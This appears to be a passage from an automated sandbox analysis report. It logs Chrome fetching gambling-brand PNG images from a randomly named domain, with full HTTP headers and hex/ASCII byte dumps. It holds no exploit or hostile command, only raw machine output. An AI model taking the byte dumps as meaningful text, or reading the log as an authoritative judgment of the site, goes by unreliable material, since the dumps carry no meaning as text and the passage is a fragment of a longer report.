                                          2025-01-12 00:17:07 UTC10972INData Raw: 73 1c 0c 93 8e b5 68 ae 39 c1 86 aa 52 db 7f d2 1c c3 7f 5a 97 e1 bd 3d f5 4e fe 35 9e da 0e e2 33 2b 35 c3 f2 8e 51 b6 de 67 7e 82 ae 1c 7f c0 70 f0 ff 00 07 e8 3a a5 94 a9 70 8d 10 8a ea 68 9c 3a 34 87 de 05 4e 77 19 2c 06 3c 14 55 47 86 74 ef 6b e2 6d 2e cd c0 78 ae 2e 62 8a 45 53 92 51 9c 03 f7 1a 14 f9 cb 32 10 76 99 67 b5 d0 f5 45 8e 3e e9 23 09 ca 31 99 57 61 8d aa 4e cf 4b d5 e1 65 91 1a 38 a4 5d c3 47 37 2b 0f a5 6c a3 84 ac ba f7 0b 83 be 68 c7 0a 58 8f ff 00 c7 4f ea d5 59 69 3d d6 76 34 fa fe a3 48 c5 76 e0 7a 73 89 4b d3 35 fe 24 b6 58 e3 bb 9e de fa 35 c6 f3 33 77 aa 3d 24 5c 37 d4 91 e9 52 3a 8c 7a 36 a9 18 7b 8b 64 13 36 ed 94 0a ea 7d 5d 30 1b e6 bd 7a d5 97 fd 1b b2 41 b5 ba 7d 29 32 68 76 8b b0 85 46 3d 2b 03 45 0d e4 7e b1 d4 ea 7a f5
                                          Data Ascii: sh9RZ=N53+5Qg~p:ph:4Nw,<UGtkm.x.bESQ2vgE>#1WaNKe8]G7+lhXOYi=v4HvzsK5$X53w=$\7R:z6{d6}]0zA})2hvF=+E~z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          81192.168.2.449834122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC609OUTGET /imgs/bet365.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 11205
                                          Last-Modified: Tue, 01 Oct 2024 15:31:11 GMT
                                          Connection: close
                                          ETag: "66fc15bf-2bc5"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC11205INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 d1 50 4c 54 45 15 81 5f 20 87 67 1c 84 63 19 83 61 24 89 69 25 89 6a 1a 84 62 ff ff ff 1e 86 65 1a 84 62 15 81 5e ff e0 21 ff e0 1d 18 82 61 22 88 68 18 82 60 0b 7c 58 ff e3 1e 11 7f 5b 0c 7e 62 14 81 63 f9 fd fb 0e 7f 65 ff e5 18 ff e9 1b 15 82 65 07 7b 64 11 7f 60 2a 8c 6d ff e6 1b 07 7b 68 ff e2 1a 06 79 54 ff e5 1e 02 79 65 cb e3 dc 48 9d 82 0d 7e 68 f2 f8 f6 ef db 21 1d 84 5e 23 87 5d da eb e6 6e a5 46 42 93 54 ed f6 f3 f7 e0 20 ff ea 15 4b 9e 84 a8 d0 c3 ff e7 16 3f 98 7c 35 92 75 01 77 66 ad d3 c7 24 87 60 d3 d0 28 11 7f 62 e4 d8 24 01 75 50 6a af 99 02 79 6a f3 de 20 dc d3 27 9f cb be 36 8e 59 4b 97 52 83 ae 42 75 a8 47 e7 f3 ef 3b 95 78 97
                                          Data Ascii: PNGIHDR2PLTE_ gca$i%jbeb^!a"h`|X[~bcee{d`*m{hyTyeH~h!^#]nFBT K?|5uwf$`(b$uPjyj '6YKRBuG;x


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          82192.168.2.449835122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC362OUTGET /imgs/gf.fc8d6758.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 40362
                                          Last-Modified: Tue, 01 Oct 2024 15:31:14 GMT
                                          Connection: close
                                          ETag: "66fc15c2-9daa"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 01 90 08 03 00 00 00 89 6b 69 6c 00 00 02 19 50 4c 54 45 00 00 00 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 0f 75 62 0d 74 62 0f 75 62 0c 72 61 0f 75 62 0e 75 62 0e 76 63 0f 75 61 0c 69 5a 0e 73 5f 0f 75 62 0e 76 62 0e 75 63 0e 75 62 0f 76 63 0e 74 61 0e 75 63 0c 75 63 0e 70 5e 0e 73 61 0d 72 60 0f 7c 68 0c 5e 4e 0a 4f 42 0f 83 6f 11 91 79 ff ff ff 02 2a 7c 0f 75 62 00 6b 57 00 5e 48 f1 f7 f6 1d 7d 6b ff de 23 00 5a 43 10 77 64 0f 76 63 00 61 4b 00 64 4f 0c 74 61 02 6d 59 04 6f 5b 08 71 5e 00 66 51 00 68 53 0a 73 5f 00 69 54 fa fd fc ee f6 f5 e1 ee ec 5f a3 96 3a 8e 7e 12 79 66 00 55 3e 82 b7 ad 17 78 66 33
                                          Data Ascii: PNGIHDRkilPLTE*|*|*|*|*|*|*|*|*|*|*|*|*|*|ubtbubraububvcuaiZs_ubvbucubvctaucucp^sar`|h^NOBoy*|ubkW^H}k#ZCwdvcaKdOtamYo[q^fQhSs_iT_:~yfU>xf3
                                          2025-01-12 00:17:07 UTC16384INData Raw: b9 24 57 e8 59 1f 7d 0e 6d 1e 42 d6 4e cd 5d 1e 67 3f 37 ac eb 24 65 b1 63 02 d5 3d a7 46 29 48 45 48 9f df e7 17 68 7e 37 00 3d 37 bb d0 69 6d 48 ca bc 5a e0 e0 e0 60 9a d7 55 ef a3 78 5e 2f 6c a9 a3 c5 48 18 1e cb 34 8d 62 66 01 61 51 e8 bd d6 db 9b 88 a5 06 d3 4b 3a b6 24 af f3 c7 36 04 2b c4 7f 9d a1 98 52 19 8b 0d 92 bb 80 01 bb c8 20 4b 92 42 66 51 e9 6b 3e 64 43 b0 1e cb ca bb 14 1b 24 85 c1 54 2c d1 9b 26 7d ab f8 c5 b6 02 c4 d5 a3 cd 47 78 18 f0 93 22 07 fd 94 28 42 fe 57 b9 a6 85 7e e6 b2 a8 9a 42 9c 1e 33 0e 0e e6 f9 88 94 91 16 94 0a b6 09 57 7d 8c 82 2c 03 a9 cc a4 a7 0d af 0b c5 e6 97 6e dd 9b 9c bb 3b 41 ce 26 7a ef cc 27 67 a4 75 6e a7 ea ae 9d e0 73 2a 20 90 24 6d c2 2b f6 23 4d 92 42 40 e3 d5 6a e2 73 af b9 c7 1e 49 ca 3b 93 9c bf d3 7b
                                          Data Ascii: $WY}mBN]g?7$ec=F)HEHh~7=7imHZ`Ux^/lH4bfaQK:$6+R KBfQk>dC$T,&}Gx"(BW~B3W},n;A&z'guns* $m+#MB@jsI;{
                                          2025-01-12 00:17:07 UTC7940INData Raw: f1 ec eb 74 fe 8a 70 b9 39 b0 54 3b 03 55 2b eb 3f 02 58 08 c0 f6 31 56 c8 0c 8b 98 08 0b fe e4 12 e0 45 52 31 b0 64 56 ff 36 b0 94 72 db 18 df cd 42 60 c1 2a fc 5e 1a a7 5f cd f2 33 ac a0 f4 23 a1 f4 ce a0 cf b0 d4 c2 32 53 ac 5d 3b 2b 08 14 78 7a e5 d1 db cb e7 3f dc 79 f7 f1 fd d4 f6 0e f6 d4 94 dc e1 b3 7d ea fd 99 77 77 3e 9c bf fc f6 d1 95 a7 55 94 73 57 99 09 d6 42 65 08 2c 2c bb 3b bd 7f 3c 09 2c 3f ff ce 96 2b d7 91 44 0d 37 91 70 e2 2f 99 5a e8 d4 12 58 24 2b ab c0 92 55 58 5b 01 b0 20 bf 97 03 8a 26 cf b4 40 c3 d7 60 2f 14 99 ac 61 71 27 69 00 8b 7b 87 27 13 91 36 b6 aa e5 79 2c d6 8b 58 5f 2f 26 d6 97 d6 f4 f4 54 32 39 36 13 ee 3e b1 35 dd 96 54 a6 6d e9 d6 99 34 37 8d 4d 26 53 d3 d3 e5 cb 39 61 d2 40 37 30 c1 32 04 16 a8 d0 ca b6 15 ca de 11
                                          Data Ascii: tp9T;U+?X1VER1dV6rB`*^_3#2S];+xz?y}ww>UsWBe,,;<,?+D7p/ZX$+UX[ &@`/aq'i{'6y,X_/&T296>5Tm47M&S9a@702


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          83192.168.2.449837122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC368OUTGET /imgs/banner/banner.365.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 16171
                                          Last-Modified: Tue, 01 Oct 2024 15:31:18 GMT
                                          Connection: close
                                          ETag: "66fc15c6-3f2b"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 00 c8 08 03 00 00 00 4c 39 3b 7d 00 00 02 82 50 4c 54 45 00 00 00 16 94 6c f9 dc 1c ff ff ff ff 35 39 fa fe fe f7 fa fa 72 b6 9a d2 e6 de a2 ca ba fa ba 26 fe 9e 2a fe 72 32 fe 56 36 fe 46 36 fb d6 1e ae d2 c2 fb c2 22 fa a6 2a fe 02 02 fa ca 22 fe 86 2e 5c aa 54 da d3 27 35 9f 7c 02 1c d3 c1 de e8 d4 e4 ec 03 29 d6 fe 62 36 4a a7 87 08 31 db fe cc 02 cb e4 ed 1c 96 6c 16 3e dc fb ea 74 f9 fe fa f6 fa f6 c7 cc 2e fa b2 26 1c 21 2a ae c5 37 34 9e 60 fe 7e 32 02 b9 5b 20 98 75 10 39 df de ee e6 92 c2 b2 28 9a 66 dd ed f3 ea f2 ee 36 81 a9 eb d8 22 42 99 9e 10 36 d3 8b ba 44 b5 d8 e6 3a a0 8a 2b 97 83 f5 da 1e 62 ae 92 2f 58 d3 ba da ce d5 ea f1 db ea ef 33 68 c4 46 a4 5c fe f1 a6 27 9a 7b c2
                                          Data Ascii: PNGIHDRL9;}PLTEl59r&*r2V6F6"*".\T'5|)b6J1l>t.&!*74`~2[ u9(f6"B6D:+b/X3hF\'{
                                          2025-01-12 00:17:07 UTC133INData Raw: dc 5c 9d df dd 0d 2b dd ba d2 fb bf ed f9 d5 cd cd e3 af b3 fb 4b d2 aa 06 d0 07 0d fa 16 1a 40 1f 34 e8 1b e8 ff f6 e9 98 00 00 18 06 82 d0 f9 57 dd bd 12 3e e0 01 d1 e1 80 4c 87 79 89 0e fb 44 87 03 44 87 03 32 1d e6 25 3a ec cb 74 98 57 a6 c3 ba 44 87 7d 99 0e f3 ca 74 58 57 a6 c3 ba 4a 75 d8 56 99 0e e3 2a d5 61 5b 55 c9 0e b3 fa 3c 4a ee 75 80 6d 4a ff e7 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: \+K@4W>LyDD2%:tWD}tXWJuV*a[U<JumJIENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          84192.168.2.449836122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC607OUTGET /imgs/wlxe.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 5313
                                          Last-Modified: Fri, 04 Oct 2024 20:16:01 GMT
                                          Connection: close
                                          ETag: "67004d01-14c1"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC5313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 55 50 4c 54 45 00 00 00 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a ff ff ff 00 00 19 00 00 10 03 07 28 00 00 14 00 01 21 00 00 16 00 00 1e 06 0b 2c 91 84 6f cd b8 8d 00 02 24 01 05 27 00 00 0c 04 08 2b b6 b7 c0 00 00 01 00 00 07 94 96 a4 ff f5 ab 13 16 33 0d 10 2e ff ff b6 1a 1a 2f ff f1 aa 55 4f 4e ff ec a6 8c 80 6b ff fc b0 f1 f1 f3 23 21 33 ff ea a1 ef d5 96 85 87 96 e8 cf 93 cb b6 8b 3f 42 5b 3e 41 5a 12 11 28 ff ff b2 4a 44 48 ff ff bc e3 cb 90 c6 b3 88 f9 e0 a0 9a 8c 71 1c 1d 35 dc
                                          Data Ascii: PNGIHDR2UPLTE***********************(!,o$'+3./UONk#!3?B[>AZ(JDHq5


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          85192.168.2.44983336.27.222.2454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC362OUTGET /t010e288a56a0b005e9.png HTTP/1.1
                                          Host: p.ssl.qhimg.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC471INHTTP/1.1 200 OK
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 3294
                                          Connection: close
                                          Expires: Fri, 11 Apr 2025 16:16:19 GMT
                                          Server: nginx
                                          Last-Modified: Wed, 05 Jul 2023 13:30:09 GMT
                                          xzp: orxleiwzhoemlml
                                          Cache-Control: max-age=7776000
                                          Access-Control-Allow-Origin: *
                                          Timing-Allow-Origin: *
                                          Accept-Ranges: bytes
                                          XCS: HIT
                                          Accept-Ranges: bytes
                                          X-Ser: i91530_c21603, i1951883_c22537
                                          X-Cache: HIT from i1951883_c22537(cloudsvr)
                                          2025-01-12 00:17:07 UTC3294INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 16 08 06 00 00 01 41 0f 09 08 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0c 95 49 44 41 54 68 05 ed 99 79 74 d4 d5 15 c7 7f bf c9 24 82 04 92 20 44 c1 80 0e a0 8d 52 14 4d 00 09 46 a3 d6 ca 62 ac a8 58 17 6c ab b2 b4 5a 41 ab a2 2c 6a 28 6a 2b 6e f4 58 ab 2c 8a 7b 8f 46 ad 25 a9 60 db 23 69 d9 44 08 c5 b2 88 ca a6 50 12 16 49 42 06 02 99 64 7e fd 7c 5f e6 0d 93 71 82 a9 f6 0f fe f0 9d f3 e6 de 77 b7 b7 dc fb ee 7b ef 37 8e 43 49 2f 19 fd b6 60 ab 8b 55 28 58 58 e4 6f 49 29 37 37 77 53 4e 4e 8e 27 7e 41 41 41 93 9c b7 b0 c0 ef cd 3c db 10 ad e2 c0 81 03 3b 5a 3c 2f 2f ef 24 e1 52 a4 ce 30 f4 b4 92 d1 9f 58 81 af 85 08 6f 94 50 da bc 51 cd 7a b1 8a 58 fd 38 62 bd 51 34 5f f5 8e
                                          Data Ascii: PNGIHDRdAgAMAaIDAThyt$ DRMFbXlZA,j(j+nX,{F%`#iDPIBd~|_qw{7CI/`U(XXoI)77wSNN'~AAA<;Z<//$R0XoPQzX8bQ4_


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          86192.168.2.449839122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC360OUTGET /imgs/xinpujing.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 8809
                                          Last-Modified: Tue, 01 Oct 2024 15:31:17 GMT
                                          Connection: close
                                          ETag: "66fc15c5-2269"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC8809INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 c8 50 4c 54 45 00 00 00 cb 9e 00 ca 9d 00 c9 9b 00 c8 9b 00 cb 9d 00 ca 9c 00 c8 9b 00 c7 9b 00 c8 9b 00 c8 9b 00 c9 9b 00 c8 9b 00 c8 9c 00 c9 9b 00 c9 9b 00 c9 9b 00 c9 9b 00 ca 9d 00 cb a1 00 c8 9b 00 c8 9c 00 c8 9b 00 c9 9a 00 c8 9a 00 c8 9b 00 c8 9c 00 c9 9b 00 c8 9b 00 c9 9b 00 c9 9c 00 c9 9c 00 c8 9b 00 c9 9c 00 c9 9b 00 c9 9c 00 c9 9b 00 c9 9b 00 c8 9b 00 c8 9a 00 c9 9c 00 c8 9b 00 c8 9b 00 c7 9b 00 c8 9a 00 c8 9b 00 c8 9c 00 c8 9c 00 c9 9b 00 c8 9b 00 ca 9d 00 c9 9c 00 c9 9b 00 c9 9b 00 c9 9a 00 c8 9a 00 cb 9d 00 c8 9b 00 c8 9b 00 c8 9b 00 c8 9b 00 c8 99 00 c8 9b 00 c8 9a 00 c6 99 00 c8 9c 00 c8 9b 00 c8 9a 00 c8 9c 00 c8 9c 00 c9 9b 00 c7
                                          Data Ascii: PNGIHDR2PLTE


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          87192.168.2.449838122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC612OUTGET /imgs/leijingji.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 9569
                                          Last-Modified: Thu, 19 Dec 2024 06:51:15 GMT
                                          Connection: close
                                          ETag: "6763c263-2561"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC9569INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 06 00 00 00 88 ec 5a 3d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                          Data Ascii: PNGIHDRZ=gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          88192.168.2.449842122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC357OUTGET /imgs/kaiyun.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 6379
                                          Last-Modified: Tue, 01 Oct 2024 15:31:15 GMT
                                          Connection: close
                                          ETag: "66fc15c3-18eb"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC6379INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 7c 50 4c 54 45 00 00 00 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 31 9d fb 11 25 4e 11 25 4e 2d a6 fc 11 25 4e 11 25 4e 11 25 4e 11 25 4e 27 93 fe 30 a9 f8 11 25 4e 11 25 4e 35 96 fc 2e 9d fd 4b c3 f8 38 c5 f7 26 99 fe 2d 91 ff 35 b8 f9 44 d3 f3 70 d0 f8 40 b6 f6 31 99 fd 22 95 ff 11 25 4e 24 b7 fc 11 25 4e 4f c0 f8 11 25 4e 2e 9d fc 60 c9 f7 11 25 4e 46 d7 f1 30 91 fe 2a 8f fe 21 69 ff 2a 94 fe 29 b7 fb 24 77 fe 20 5e ff 24 ad fe 11 25 4e 36 92 fd 6a cc f7 65 c9 f7 35 e3 ea 39 a4 f9 20 61 ff 4a b7 f4 20 bf f9 31 df ea 3a a4 f8 2a d2 f7 66 c9 f7 2a d6 f5 23 6b fe 36 9c fb 22 ad fe 45 b2 f5 21 65 ff 3d
                                          Data Ascii: PNGIHDR2|PLTE%N%N%N%N%N%N%N%N%N%N1%N%N-%N%N%N%N'0%N%N5.K8&-5Dp@1"%N$%NO%N.`%NF0*!i*)$w ^$%N6je59 aJ 1:*f*#k6"E!e=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          89192.168.2.449840122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC609OUTGET /imgs/betway.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 6928
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-1b10"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
